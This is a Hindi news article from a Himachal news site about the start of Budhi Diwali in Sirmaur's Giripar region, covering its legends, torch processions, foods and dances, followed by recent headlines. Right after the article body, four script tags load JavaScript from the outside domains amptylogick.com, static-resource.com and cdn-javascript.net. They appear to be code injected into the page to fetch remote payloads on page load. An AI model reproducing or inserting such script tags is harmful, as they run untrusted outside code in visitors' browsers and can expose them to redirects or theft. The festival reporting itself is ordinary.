Categories: हिमाचल

सिरमौर में बूढ़ी दिवाली का हुआ आगाज

<p>जिला सिरमौर जिले के गिरिपार क्षेत्र में बीती रात से ही बूढ़ी दिवाली का आगाज हो गया है। बूढ़ी दिवाली का यह पर्व गिरी पार क्षेत्र में 4 दिन से 7 दिन तक मनाया जाता है। मान्यता है कि दीपावली से अगली अमावस्या में दैत्यराज बली पाताल लोक से धरती पर आए थे। उनके धरती पर आगमन की खुशी में उस समय दिवाली जैसा त्यौहार मनाया था। उस समय से चली आ रही इस पौराणिक त्यौहार की परंपरा को आज बूढ़ी दिवाली कहा जाता है। इस त्यौहार को मनाने के पीछे एक मान्यता भगवान श्री राम के अयोध्या आगमन से भी जुड़ी है। बताया जाता है कि सुदूर पहाड़ी क्षेत्रों में भगवान श्री राम के अयोध्या आगमन की खबर एक महीने बाद पहुंची थी। ऐसे में पहाड़ी क्षेत्र के लोगों ने उसी दिन दिवाली मनाई थी।</p>

<p>हालांकि बूढ़ी दिवाली क्यों मनाई जाती है, इसके कोई शास्त्रीय प्रमाण नहीं है। लेकिन इस त्यौहार के प्रति लोगों की आस्था बरकरार है। गिरी क्षेत्र के अधिकतर हिस्सों में आज भी लोग अमावस्या की सुबह तड़के हाथ में मशालें लेकर ढोल नगाड़ों की थाप पर नाचते गाते बूढ़ी दिवाली की शुरुआत करते हैं। मसालों का यह जुलूस गांव के बाहर तक जाता है। जहां एकत्र घास फूस को जलाया जाता है।</p>

<p>इसके पीछे मान्यता यह है कि मशालों का भय दिखाकर बुरी आत्माओं और विपत्तियों को गांव के बाहर कर कूड़े के ढेर में जला दिया जाता है। जिससे साल भर गांव की बुरी आत्माओं और रोगों आदि से रक्षा होती है। इसके बाद कई दिन तक चलने वाला बूढ़ी दिवाली का जश्न शुरू होता है। इस त्यौहार पर नवविवाहित लड़कियां अपने मायके आती हैं और परिवार के साथ त्यौहार मनाती हैं। त्यौहार की खासियत यह है कि लगातार चार से 7 दिन तक परंपरागत व्यंजन हर रसोई में बनते हैं। बूढ़ी दिवाली पर विशेष तौर पर गेहूं की नमकीन यानी मूड़ा और चावल के पापड़ बनाए जाते हैं। घर में आने वाले हर मेहमान और मित्र बंधुओं को मूड़ा और पापड़ अखरोट के साथ परोसे जाते हैं।</p>

<p>बूढ़ी दिवाली के त्यौहार पर लोग खाने-पीने के साथ-साथ नाच गाने का भी जमकर लुत्फ उठाते उठाते हैं। अमावस्या के कई दिनों तक नाच गाना और मस्ती चलती है। परम परंपरागत वेशभूषा में सजे स्त्री पुरुष ढोल नगाड़ों और हुड़क की थाप पर नाचते गाते हैं। इस अवसर पर स्थानीय देवी देवताओं की भी विधिवत पूजा की जाती है और उनको दिवाली का हिस्सा अर्पित किया जाता है। त्यौहार की एक खासियत यह भी है कि क्षेत्र के लोग खासकर युवा देश में कहीं भी हो बूढ़ी दिवाली पर अपने घर जरूर पहुंचते हैं। बूढ़ी दिवाली क्षेत्र का ना सिर्फ धार्मिक बल्कि सामाजिक रूप से भी लोगों को आपस में जोड़कर रखने का अनोखा त्यौहार है। ऐसा नहीं है कि बदलते समय के साथ पाश्चात्य संस्कृति का रंग पहाड़ों पर नहीं चढ़ा है लेकिन बावजूद उसके क्षेत्र के युवाओं ने&nbsp; बूढ़ी दिवाली सरीखे प्राचीन परंपरागत त्योहारों को अब तक संजोह कर रखा है। युवाओं का इस त्यौहार और अपनी संस्कृति और परंपराओं के प्रति लगाओ देखते ही बनता है। यही कारण है कि बूढ़ी दिवाली का त्यौहार आज भी सुदूर गिरी पार्षदों में बड़ी धूमधाम से मनाया जाता है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1574837422934″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

लेह-दिल्ली रूट पर एचआरटीसी की बस सेवा बंद, जून 2025 तक बहाल होगा रूट

  अब यात्रियों को मनाली-केलांग-लेह के बीच टैक्सियों में मंहगा सफर करना पड़ेगा Shimla :एचआरटीसी…

10 hours ago

चिकन की दुकानों में स्वच्छता के नियम दरकिनार

  Hamirpur:जिला खाद्य सुरक्षा विभाग द्वारा किए गए चिकन की दुकानों के निरीक्षण में स्वच्छता…

11 hours ago

रैगिंग के आरोपी विद्यार्थी की बिना वारंट के होगी गिरफ्तारी, हो सकती है तीन साल की सजा

  Hamirpur:होटल प्रंबधन संस्थान (आईएचएम) हमीरपुर की एंटी रैगिंग समिति की बैठक वीरवार को संस्थान…

11 hours ago

कोट और मटाहणी स्कूल की छात्राओं को समझाया तनाव प्रबंधन

  Hamirpur: महिला एवं बाल विकास विभाग ने वीरवार को राजकीय वरिष्ठ माध्यमिक पाठशाला कोट…

11 hours ago

लक्ष्य तय करें और उसके लिए कड़ी मेहनत करें

एसडीएम संजय स्वरूप ने बाहनवीं स्कूल के विद्यार्थियों को दी नसीहत महिला एवं बाल विकास…

11 hours ago

Nahan: NSUI ने दिल्ली गेट के समीप फूंका मंत्री रवनीत सिंह बिट्टू का पुतला

नेता प्रतिपक्ष राहुल गांधी के खिलाफ बीजेपी के मंत्री ने की थी बयान बाजी मंत्री…

13 hours ago